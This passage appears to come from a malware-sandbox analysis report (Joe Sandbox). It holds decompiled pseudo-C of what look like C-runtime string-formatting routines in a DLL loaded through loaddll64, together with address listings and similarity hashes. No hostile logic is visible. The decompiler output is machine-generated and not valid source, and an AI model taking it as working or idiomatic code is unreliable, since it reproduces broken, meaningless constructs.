                                                                      				if ( *((intOrPtr*)(_t315 + 0x10)) !=  *((intOrPtr*)(_t315 + 8))) goto 0x8002e201;
                                                                      				if ( *((intOrPtr*)(_t315 + 0x18)) == bpl) goto 0x8002e1f9;
                                                                      				goto 0x8002e1fc;
                                                                      				 *(_t281 + 0x20) =  *(_t281 + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002e227;
                                                                      				 *(_t281 + 0x20) = _t284 + 1;
                                                                      				 *((intOrPtr*)(_t315 + 0x10)) =  *((intOrPtr*)(_t315 + 0x10)) + _t323;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x460)))))) = r13w;
                                                                      				 *((long long*)( *((intOrPtr*)(_t281 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t281 + 0x460)))) + 2;
                                                                      				if ( *(_t281 + 0x20) == 0xffffffff) goto 0x8002e234;
                                                                      				r9d = r9d + r12d;
                                                                      				if (r9d - _t196 < 0) goto 0x8002e1de;
                                                                      				_t306 = _t281 + 0x20;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(_t281 + 8));
                                                                      				_t326 = _t281 + 0x460;
                                                                      				_t286 = _t326;
                                                                      				E00000001180036148(_t284 + 1, _t196, _t281, _t286, _t307, _t309, _t306);
                                                                      				if ((r12b & 0) == 0) goto 0x8002e2c0;
                                                                      				if ((r12b &  *(_t281 + 0x28) >> 0x00000002) != 0) goto 0x8002e2c0;
                                                                      				r8d = 0;
                                                                      				if (_t196 <= 0) goto 0x8002e2c0;
                                                                      				_t301 =  *_t326;
                                                                      				if ( *((intOrPtr*)(_t301 + 0x10)) !=  *((intOrPtr*)(_t301 + 8))) goto 0x8002e297;
                                                                      				if ( *((intOrPtr*)(_t301 + 0x18)) == bpl) goto 0x8002e290;
                                                                      				goto 0x8002e293;
                                                                      				 *_t306 =  *_t306 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002e2b3;
                                                                      				 *_t306 = _t286 + 1;
                                                                      				 *((intOrPtr*)(_t301 + 0x10)) =  *((intOrPtr*)(_t301 + 0x10)) + _t323;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t326)))) = r15w;
                                                                      				 *((long long*)( *_t326)) =  *((long long*)( *_t326)) + 2;
                                                                      				if ( *_t306 == 0xffffffff) goto 0x8002e2c0;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t196 < 0) goto 0x8002e279;
                                                                      				if ( *((intOrPtr*)(_t281 + 0x4c)) != bpl) goto 0x8002e3a2;
                                                                      				if ( *(_t281 + 0x48) <= 0) goto 0x8002e3a2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 0x28)) != bpl) goto 0x8002e2ea;
                                                                      				E000000011800338E0( *_t326, _t281,  *((intOrPtr*)(_t281 + 8)), _t301, _t307);
                                                                      				r9d = 0;
                                                                      				if ( *(_t281 + 0x48) == 0) goto 0x8002e367;
                                                                      				_v72 = r9w;
                                                                      				_t161 = E00000001180040E3C( *_t306, 0, _t281,  &_v72,  *((intOrPtr*)(_t281 + 0x40)), _t306, _t307, _t309,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 0x18)) + 8)),  *((intOrPtr*)(_t281 + 8)));
                                                                      				r9d = 0;
                                                                      				if (_t161 <= 0) goto 0x8002e39c;
                                                                      				_t290 =  *_t326;
                                                                      				if ( *((intOrPtr*)(_t290 + 0x10)) !=  *((intOrPtr*)(_t290 + 8))) goto 0x8002e342;
                                                                      				if ( *((intOrPtr*)(_t290 + 0x18)) == r9b) goto 0x8002e33c;
                                                                      				 *(_t281 + 0x20) =  *(_t281 + 0x20) + r12d;
                                                                      				goto 0x8002e35a;
                                                                      				 *(_t281 + 0x20) =  *(_t281 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002e35a;
                                                                      				 *(_t281 + 0x20) =  *(_t281 + 0x20) + r12d;
                                                                      				 *((intOrPtr*)(_t290 + 0x10)) =  *((intOrPtr*)(_t290 + 0x10)) + _t323;
                                                                      				 *((short*)( *((intOrPtr*)( *_t326)))) = _v72 & 0x0000ffff;
                                                                      				 *((long long*)( *_t326)) =  *((long long*)( *_t326)) + 2;
                                                                      				if (0 + r12d !=  *(_t281 + 0x48)) goto 0x8002e2f5;
                                                                      				r13d = 0x20;
                                                                      				_t181 =  *_t306;
                                                                      				if (_t181 < 0) goto 0x8002e3f0;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e3f0;
                                                                      				r8d = 0;
                                                                      				if (_t196 <= 0) goto 0x8002e3f0;
                                                                      				_t303 =  *_t326;
                                                                      				if ( *((intOrPtr*)(_t303 + 0x10)) !=  *((intOrPtr*)(_t303 + 8))) goto 0x8002e3c7;
                                                                      				if ( *((intOrPtr*)(_t303 + 0x18)) == bpl) goto 0x8002e3c0;
                                                                      				goto 0x8002e3c3;
                                                                      				 *(_t281 + 0x20) =  *(_t281 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002e365;
                                                                      				r8d =  *(_t281 + 0x48);
                                                                      				_t292 = _t326;
                                                                      				_v88 =  *((intOrPtr*)(_t281 + 8));
                                                                      				E00000001180036148( *(_t281 + 0x28) >> 2, _t196, _t281, _t292, _t307, _t309, _t306);
                                                                      				goto 0x8002e36d;
                                                                      				 *_t306 = _t181 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002e3e3;
                                                                      				 *_t306 = _t292 + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x40)) + 0x10)) + _t323;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t326)))) = r13w;
                                                                      				 *((long long*)( *_t326)) =  *((long long*)( *_t326)) + 2;
                                                                      				if ( *_t306 == 0xffffffff) goto 0x8002e3f0;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t196 < 0) goto 0x8002e385;
                                                                      				return E000000011800028F0(r12b,  *_t306, _v56 ^ _t312);
                                                                      			}








































                                                                      0x18002dfac
                                                                      0x18002dfac
                                                                      0x18002dfac
                                                                      0x18002dfac
                                                                      0x18002dfac
                                                                      0x18002dfb1
                                                                      0x18002dfb6
                                                                      0x18002dfc4
                                                                      0x18002dfc8
                                                                      0x18002dfd2
                                                                      0x18002dfd7
                                                                      0x18002dfe0
                                                                      0x18002dfe3
                                                                      0x18002dfe3
                                                                      0x18002dfe6
                                                                      0x18002dfe6
                                                                      0x18002dfea
                                                                      0x18002dfee
                                                                      0x18002dff0
                                                                      0x18002dffa
                                                                      0x18002e004
                                                                      0x18002e00a
                                                                      0x18002e014
                                                                      0x18002e01e
                                                                      0x18002e023
                                                                      0x18002e029
                                                                      0x18002e02f
                                                                      0x18002e039
                                                                      0x18002e041
                                                                      0x18002e046
                                                                      0x18002e04b
                                                                      0x18002e050
                                                                      0x18002e058
                                                                      0x18002e05d
                                                                      0x18002e066
                                                                      0x18002e06c
                                                                      0x18002e072
                                                                      0x18002e078
                                                                      0x18002e07e
                                                                      0x18002e084
                                                                      0x18002e08a
                                                                      0x18002e08f
                                                                      0x18002e093
                                                                      0x18002e095
                                                                      0x18002e09a
                                                                      0x18002e09c
                                                                      0x18002e0a3
                                                                      0x18002e0aa
                                                                      0x18002e0ac
                                                                      0x18002e0b7
                                                                      0x18002e0b9
                                                                      0x18002e0bd
                                                                      0x18002e0c2
                                                                      0x18002e0c5
                                                                      0x18002e0ca
                                                                      0x18002e0cc
                                                                      0x18002e0d1
                                                                      0x18002e0d3
                                                                      0x18002e0d9
                                                                      0x18002e0de
                                                                      0x18002e0e9
                                                                      0x18002e0ed
                                                                      0x18002e0f9
                                                                      0x18002e102
                                                                      0x18002e10c
                                                                      0x18002e112
                                                                      0x18002e117
                                                                      0x18002e11e
                                                                      0x18002e123
                                                                      0x18002e131
                                                                      0x18002e13b
                                                                      0x18002e13d
                                                                      0x18002e141
                                                                      0x18002e146
                                                                      0x18002e14b
                                                                      0x18002e152
                                                                      0x18002e15b
                                                                      0x18002e15d
                                                                      0x18002e163
                                                                      0x18002e166
                                                                      0x18002e16b
                                                                      0x18002e17c
                                                                      0x18002e180
                                                                      0x18002e189
                                                                      0x18002e18b
                                                                      0x18002e192
                                                                      0x18002e1a2
                                                                      0x18002e1a6
                                                                      0x18002e1a8
                                                                      0x18002e1b2
                                                                      0x18002e1b9
                                                                      0x18002e1be
                                                                      0x18002e1cc
                                                                      0x18002e1d2
                                                                      0x18002e1d4
                                                                      0x18002e1d9
                                                                      0x18002e1de
                                                                      0x18002e1ed
                                                                      0x18002e1f3
                                                                      0x18002e1f7
                                                                      0x18002e1fc
                                                                      0x18002e1ff
                                                                      0x18002e204
                                                                      0x18002e207
                                                                      0x18002e215
                                                                      0x18002e220
                                                                      0x18002e22a
                                                                      0x18002e22c
                                                                      0x18002e232
                                                                      0x18002e238
                                                                      0x18002e23c
                                                                      0x18002e23f
                                                                      0x18002e244
                                                                      0x18002e24e
                                                                      0x18002e256
                                                                      0x18002e266
                                                                      0x18002e26e
                                                                      0x18002e270
                                                                      0x18002e275
                                                                      0x18002e279
                                                                      0x18002e284
                                                                      0x18002e28a
                                                                      0x18002e28e
                                                                      0x18002e293
                                                                      0x18002e295
                                                                      0x18002e29a
                                                                      0x18002e29c
                                                                      0x18002e2a6
                                                                      0x18002e2ad
                                                                      0x18002e2b6
                                                                      0x18002e2b8
                                                                      0x18002e2be
                                                                      0x18002e2c4
                                                                      0x18002e2cf
                                                                      0x18002e2dd
                                                                      0x18002e2e2
                                                                      0x18002e2ee
                                                                      0x18002e2f3
                                                                      0x18002e2fe
                                                                      0x18002e30f
                                                                      0x18002e314
                                                                      0x18002e31c
                                                                      0x18002e31e
                                                                      0x18002e32e
                                                                      0x18002e334
                                                                      0x18002e336
                                                                      0x18002e33a
                                                                      0x18002e33c
                                                                      0x18002e340
                                                                      0x18002e342
                                                                      0x18002e346
                                                                      0x18002e350
                                                                      0x18002e356
                                                                      0x18002e363
                                                                      0x18002e367
                                                                      0x18002e36d
                                                                      0x18002e371
                                                                      0x18002e37c
                                                                      0x18002e37e
                                                                      0x18002e383
                                                                      0x18002e385
                                                                      0x18002e390
                                                                      0x18002e396
                                                                      0x18002e39a
                                                                      0x18002e39c
                                                                      0x18002e3a0
                                                                      0x18002e3a9
                                                                      0x18002e3ad
                                                                      0x18002e3b4
                                                                      0x18002e3b9
                                                                      0x18002e3be
                                                                      0x18002e3c3
                                                                      0x18002e3c5
                                                                      0x18002e3ca
                                                                      0x18002e3cc
                                                                      0x18002e3d6
                                                                      0x18002e3dd
                                                                      0x18002e3e6
                                                                      0x18002e3e8
                                                                      0x18002e3ee
                                                                      0x18002e41d

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da0cc8902e82ac88275d87031d2b860f85cef95d0659ba32c638974242b146fa
                                                                      • Instruction ID: 9e4ab7ee56d75735762e8491844a7e00a6afe249559dee7c3e76c7389232cf89
                                                                      • Opcode Fuzzy Hash: da0cc8902e82ac88275d87031d2b860f85cef95d0659ba32c638974242b146fa
                                                                      • Instruction Fuzzy Hash: 6EE19E3264068882EBABCF2980407AD37A0F74ABC4F54D626FE4D43795DF75CA9AC744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118002E420(long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				short _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t124;
                                                                      				void* _t127;
                                                                      				void* _t159;
                                                                      				void* _t166;
                                                                      				unsigned int _t167;
                                                                      				signed char _t168;
                                                                      				signed int _t179;
                                                                      				signed short _t191;
                                                                      				void* _t194;
                                                                      				void* _t198;
                                                                      				signed long long _t259;
                                                                      				long long _t277;
                                                                      				long long _t279;
                                                                      				long long _t280;
                                                                      				intOrPtr* _t282;
                                                                      				intOrPtr _t286;
                                                                      				intOrPtr* _t288;
                                                                      				void* _t292;
                                                                      				signed long long _t294;
                                                                      				intOrPtr _t297;
                                                                      				intOrPtr _t299;
                                                                      				void* _t301;
                                                                      				signed int* _t302;
                                                                      				long long _t305;
                                                                      				void* _t307;
                                                                      				signed long long _t308;
                                                                      				void* _t310;
                                                                      				intOrPtr _t311;
                                                                      				signed long long _t319;
                                                                      				void* _t320;
                                                                      				intOrPtr* _t322;
                                                                      
                                                                      				_t310 = __r8;
                                                                      				_t305 = __rbp;
                                                                      				_t303 = __rsi;
                                                                      				_t292 = __rdx;
                                                                      				_t279 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t308 = _t307 - 0x50;
                                                                      				_t259 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t259 ^ _t308;
                                                                      				_t124 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t277 = __rcx;
                                                                      				_t6 = _t301 - 0x20; // 0x58
                                                                      				_t191 = _t6;
                                                                      				_t7 = _t301 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t198 = _t124 - 0x64;
                                                                      				if (_t198 > 0) goto 0x8002e4d6;
                                                                      				if (_t198 == 0) goto 0x8002e547;
                                                                      				if (_t124 == 0x41) goto 0x8002e554;
                                                                      				if (_t124 == 0x43) goto 0x8002e4b3;
                                                                      				if (_t124 - 0x44 <= 0) goto 0x8002e55f;
                                                                      				if (_t124 - 0x47 <= 0) goto 0x8002e554;
                                                                      				if (_t124 == 0x53) goto 0x8002e509;
                                                                      				if (_t124 == _t191) goto 0x8002e4c9;
                                                                      				if (_t124 == 0x5a) goto 0x8002e4bf;
                                                                      				if (_t124 == 0x61) goto 0x8002e554;
                                                                      				if (_t124 != 0x63) goto 0x8002e55f;
                                                                      				E00000001180031990(_t124 - 0x63, __rcx, __rcx, __rsi);
                                                                      				goto 0x8002e559;
                                                                      				E0000000118002F280(_t166, __rcx, __rcx, _t303);
                                                                      				goto 0x8002e559;
                                                                      				_t127 = E0000000118001F93C(r12b, __rcx, __rcx, _t292, _t303, __rbp, _t310, __r10);
                                                                      				goto 0x8002e559;
                                                                      				if (_t127 - 0x67 <= 0) goto 0x8002e554;
                                                                      				if (_t127 == 0x69) goto 0x8002e547;
                                                                      				if (_t127 == 0x6e) goto 0x8002e540;
                                                                      				if (_t127 == 0x6f) goto 0x8002e520;
                                                                      				if (_t127 == 0x70) goto 0x8002e510;
                                                                      				if (_t127 == 0x73) goto 0x8002e509;
                                                                      				if (_t127 == 0x75) goto 0x8002e54b;
                                                                      				if (_t127 != 0x78) goto 0x8002e55f;
                                                                      				goto 0x8002e4cc;
                                                                      				E00000001180032D84(__rcx, __rcx, _t303);
                                                                      				goto 0x8002e559;
                                                                      				 *((intOrPtr*)(_t279 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t279 + 0x34)) = 0xb;
                                                                      				goto 0x8002e4c9;
                                                                      				_t167 =  *(_t279 + 0x28);
                                                                      				if ((r12b & _t167 >> 0x00000005) == 0) goto 0x8002e534;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t277 + 0x28) = _t167;
                                                                      				_t280 = _t277;
                                                                      				E0000000118001C92C(0, _t277, _t280, _t292, _t303, _t305, _t310, __r10);
                                                                      				goto 0x8002e559;
                                                                      				E00000001180032360(_t277, _t280);
                                                                      				goto 0x8002e559;
                                                                      				 *(_t280 + 0x28) =  *(_t280 + 0x28) | 0x00000010;
                                                                      				E0000000118001E134(0, _t277, _t280, _t292, _t303, _t305, _t310, __r10);
                                                                      				goto 0x8002e559;
                                                                      				if (E00000001180030D6C(0, 0x78, _t277, _t280, _t305) != 0) goto 0x8002e566;
                                                                      				goto 0x8002e851;
                                                                      				if ( *((intOrPtr*)(_t277 + 0x38)) != bpl) goto 0x8002e84e;
                                                                      				_t168 =  *(_t277 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r13d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e5c4;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e5a6;
                                                                      				_v68 = _t320 + 0xd;
                                                                      				goto 0x8002e5c1;
                                                                      				if ((r12b & _t168) == 0) goto 0x8002e5b2;
                                                                      				goto 0x8002e59f;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e5c4;
                                                                      				_v68 = r13w;
                                                                      				_t294 = _t319;
                                                                      				r8d =  *(_t277 + 0x3a) & 0x0000ffff;
                                                                      				r10d = 0xffdf;
                                                                      				if ((r10w & (r8w & 0xffffffff) - _t191) != 0) goto 0x8002e5e9;
                                                                      				r9b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8002e5ec;
                                                                      				r9b = bpl;
                                                                      				r15d = 0x30;
                                                                      				if (r9b != 0) goto 0x8002e606;
                                                                      				if (0 == 0) goto 0x8002e625;
                                                                      				 *((intOrPtr*)(_t308 + 0x34 + _t294 * 2)) = r15w;
                                                                      				if (r8w == _t191) goto 0x8002e619;
                                                                      				if (r8w != 0x41) goto 0x8002e61c;
                                                                      				 *((short*)(_t308 + 0x36 + _t294 * 2)) = _t191 & 0x0000ffff;
                                                                      				_t194 =  *((intOrPtr*)(_t277 + 0x2c)) -  *(_t277 + 0x48);
                                                                      				if ((_t168 & 0x0000000c) != 0) goto 0x8002e692;
                                                                      				r9d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002e692;
                                                                      				_t311 =  *((intOrPtr*)(_t277 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t311 + 0x10)) !=  *((intOrPtr*)(_t311 + 8))) goto 0x8002e65f;
                                                                      				if ( *((intOrPtr*)(_t311 + 0x18)) == bpl) goto 0x8002e657;
                                                                      				goto 0x8002e65a;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002e685;
                                                                      				 *(_t277 + 0x20) = _t280 + 1;
                                                                      				 *((intOrPtr*)(_t311 + 0x10)) =  *((intOrPtr*)(_t311 + 0x10)) + _t319;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x460)))))) = r13w;
                                                                      				 *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) + 2;
                                                                      				if ( *(_t277 + 0x20) == 0xffffffff) goto 0x8002e692;
                                                                      				r9d = r9d + r12d;
                                                                      				if (r9d - _t194 < 0) goto 0x8002e63c;
                                                                      				_t302 = _t277 + 0x20;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(_t277 + 8));
                                                                      				_t322 = _t277 + 0x460;
                                                                      				_t282 = _t322;
                                                                      				E00000001180036148(_t280 + 1, _t194, _t277, _t282, _t303, _t305, _t302);
                                                                      				if ((r12b & 0) == 0) goto 0x8002e71e;
                                                                      				if ((r12b &  *(_t277 + 0x28) >> 0x00000002) != 0) goto 0x8002e71e;
                                                                      				r8d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002e71e;
                                                                      				_t297 =  *_t322;
                                                                      				if ( *((intOrPtr*)(_t297 + 0x10)) !=  *((intOrPtr*)(_t297 + 8))) goto 0x8002e6f5;
                                                                      				if ( *((intOrPtr*)(_t297 + 0x18)) == bpl) goto 0x8002e6ee;
                                                                      				goto 0x8002e6f1;
                                                                      				 *_t302 =  *_t302 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002e711;
                                                                      				 *_t302 = _t282 + 1;
                                                                      				 *((intOrPtr*)(_t297 + 0x10)) =  *((intOrPtr*)(_t297 + 0x10)) + _t319;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t322)))) = r15w;
                                                                      				 *((long long*)( *_t322)) =  *((long long*)( *_t322)) + 2;
                                                                      				if ( *_t302 == 0xffffffff) goto 0x8002e71e;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t194 < 0) goto 0x8002e6d7;
                                                                      				if ( *((intOrPtr*)(_t277 + 0x4c)) != bpl) goto 0x8002e800;
                                                                      				if ( *(_t277 + 0x48) <= 0) goto 0x8002e800;
                                                                      				_t321 =  *((intOrPtr*)(_t277 + 8));
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t277 + 8)) + 0x28)) != bpl) goto 0x8002e748;
                                                                      				E000000011800338E0( *_t322, _t277,  *((intOrPtr*)(_t277 + 8)), _t297, _t303);
                                                                      				r9d = 0;
                                                                      				if ( *(_t277 + 0x48) == 0) goto 0x8002e7c5;
                                                                      				_v72 = r9w;
                                                                      				_t159 = E00000001180040E3C( *_t302, 0, _t277,  &_v72,  *((intOrPtr*)(_t277 + 0x40)), _t302, _t303, _t305,  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x18)) + 8)),  *((intOrPtr*)(_t277 + 8)));
                                                                      				r9d = 0;
                                                                      				if (_t159 <= 0) goto 0x8002e7fa;
                                                                      				_t286 =  *_t322;
                                                                      				if ( *((intOrPtr*)(_t286 + 0x10)) !=  *((intOrPtr*)(_t286 + 8))) goto 0x8002e7a0;
                                                                      				if ( *((intOrPtr*)(_t286 + 0x18)) == r9b) goto 0x8002e79a;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
                                                                      				goto 0x8002e7b8;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002e7b8;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
                                                                      				 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)(_t286 + 0x10)) + _t319;
                                                                      				 *((short*)( *((intOrPtr*)( *_t322)))) = _v72 & 0x0000ffff;
                                                                      				 *((long long*)( *_t322)) =  *((long long*)( *_t322)) + 2;
                                                                      				if (0 + r12d !=  *(_t277 + 0x48)) goto 0x8002e753;
                                                                      				r13d = 0x20;
                                                                      				_t179 =  *_t302;
                                                                      				if (_t179 < 0) goto 0x8002e84e;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e84e;
                                                                      				r8d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002e84e;
                                                                      				_t299 =  *_t322;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x10)) !=  *((intOrPtr*)(_t299 + 8))) goto 0x8002e825;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x18)) == bpl) goto 0x8002e81e;
                                                                      				goto 0x8002e821;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002e7c3;
                                                                      				r8d =  *(_t277 + 0x48);
                                                                      				_t288 = _t322;
                                                                      				_v88 =  *((intOrPtr*)(_t277 + 8));
                                                                      				E00000001180036148( *(_t277 + 0x28) >> 2, _t194, _t277, _t288, _t303, _t305, _t302);
                                                                      				goto 0x8002e7cb;
                                                                      				 *_t302 = _t179 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002e841;
                                                                      				 *_t302 = _t288 + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) + _t319;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t322)))) = r13w;
                                                                      				 *((long long*)( *_t322)) =  *((long long*)( *_t322)) + 2;
                                                                      				if ( *_t302 == 0xffffffff) goto 0x8002e84e;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t194 < 0) goto 0x8002e7e3;
                                                                      				return E000000011800028F0(r12b,  *_t302, _v56 ^ _t308);
                                                                      			}









































                                                                      0x18002e420
                                                                      0x18002e420
                                                                      0x18002e420
                                                                      0x18002e420
                                                                      0x18002e420
                                                                      0x18002e420
                                                                      0x18002e425
                                                                      0x18002e42a
                                                                      0x18002e438
                                                                      0x18002e43c
                                                                      0x18002e446
                                                                      0x18002e44b
                                                                      0x18002e454
                                                                      0x18002e457
                                                                      0x18002e457
                                                                      0x18002e45a
                                                                      0x18002e45a
                                                                      0x18002e45e
                                                                      0x18002e462
                                                                      0x18002e464
                                                                      0x18002e46e
                                                                      0x18002e478
                                                                      0x18002e47e
                                                                      0x18002e488
                                                                      0x18002e492
                                                                      0x18002e497
                                                                      0x18002e49d
                                                                      0x18002e4a3
                                                                      0x18002e4ad
                                                                      0x18002e4b5
                                                                      0x18002e4ba
                                                                      0x18002e4bf
                                                                      0x18002e4c4
                                                                      0x18002e4cc
                                                                      0x18002e4d1
                                                                      0x18002e4da
                                                                      0x18002e4e0
                                                                      0x18002e4e6
                                                                      0x18002e4ec
                                                                      0x18002e4f2
                                                                      0x18002e4f8
                                                                      0x18002e4fe
                                                                      0x18002e503
                                                                      0x18002e507
                                                                      0x18002e509
                                                                      0x18002e50e
                                                                      0x18002e510
                                                                      0x18002e517
                                                                      0x18002e51e
                                                                      0x18002e520
                                                                      0x18002e52b
                                                                      0x18002e52d
                                                                      0x18002e531
                                                                      0x18002e536
                                                                      0x18002e539
                                                                      0x18002e53e
                                                                      0x18002e540
                                                                      0x18002e545
                                                                      0x18002e547
                                                                      0x18002e54d
                                                                      0x18002e552
                                                                      0x18002e55d
                                                                      0x18002e561
                                                                      0x18002e56a
                                                                      0x18002e570
                                                                      0x18002e575
                                                                      0x18002e57c
                                                                      0x18002e581
                                                                      0x18002e58f
                                                                      0x18002e599
                                                                      0x18002e59f
                                                                      0x18002e5a4
                                                                      0x18002e5a9
                                                                      0x18002e5b0
                                                                      0x18002e5b9
                                                                      0x18002e5bb
                                                                      0x18002e5c1
                                                                      0x18002e5c4
                                                                      0x18002e5c9
                                                                      0x18002e5da
                                                                      0x18002e5de
                                                                      0x18002e5e7
                                                                      0x18002e5e9
                                                                      0x18002e5f0
                                                                      0x18002e600
                                                                      0x18002e604
                                                                      0x18002e606
                                                                      0x18002e610
                                                                      0x18002e617
                                                                      0x18002e61c
                                                                      0x18002e62a
                                                                      0x18002e630
                                                                      0x18002e632
                                                                      0x18002e637
                                                                      0x18002e63c
                                                                      0x18002e64b
                                                                      0x18002e651
                                                                      0x18002e655
                                                                      0x18002e65a
                                                                      0x18002e65d
                                                                      0x18002e662
                                                                      0x18002e665
                                                                      0x18002e673
                                                                      0x18002e67e
                                                                      0x18002e688
                                                                      0x18002e68a
                                                                      0x18002e690
                                                                      0x18002e696
                                                                      0x18002e69a
                                                                      0x18002e69d
                                                                      0x18002e6a2
                                                                      0x18002e6ac
                                                                      0x18002e6b4
                                                                      0x18002e6c4
                                                                      0x18002e6cc
                                                                      0x18002e6ce
                                                                      0x18002e6d3
                                                                      0x18002e6d7
                                                                      0x18002e6e2
                                                                      0x18002e6e8
                                                                      0x18002e6ec
                                                                      0x18002e6f1
                                                                      0x18002e6f3
                                                                      0x18002e6f8
                                                                      0x18002e6fa
                                                                      0x18002e704
                                                                      0x18002e70b
                                                                      0x18002e714
                                                                      0x18002e716
                                                                      0x18002e71c
                                                                      0x18002e722
                                                                      0x18002e72d
                                                                      0x18002e733
                                                                      0x18002e73b
                                                                      0x18002e740
                                                                      0x18002e74c
                                                                      0x18002e751
                                                                      0x18002e75c
                                                                      0x18002e76d
                                                                      0x18002e772
                                                                      0x18002e77a
                                                                      0x18002e77c
                                                                      0x18002e78c
                                                                      0x18002e792
                                                                      0x18002e794
                                                                      0x18002e798
                                                                      0x18002e79a
                                                                      0x18002e79e
                                                                      0x18002e7a0
                                                                      0x18002e7a4
                                                                      0x18002e7ae
                                                                      0x18002e7b4
                                                                      0x18002e7c1
                                                                      0x18002e7c5
                                                                      0x18002e7cb
                                                                      0x18002e7cf
                                                                      0x18002e7da
                                                                      0x18002e7dc
                                                                      0x18002e7e1
                                                                      0x18002e7e3
                                                                      0x18002e7ee
                                                                      0x18002e7f4
                                                                      0x18002e7f8
                                                                      0x18002e7fa
                                                                      0x18002e7fe
                                                                      0x18002e807
                                                                      0x18002e80b
                                                                      0x18002e812
                                                                      0x18002e817
                                                                      0x18002e81c
                                                                      0x18002e821
                                                                      0x18002e823
                                                                      0x18002e828
                                                                      0x18002e82a
                                                                      0x18002e834
                                                                      0x18002e83b
                                                                      0x18002e844
                                                                      0x18002e846
                                                                      0x18002e84c
                                                                      0x18002e87b

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
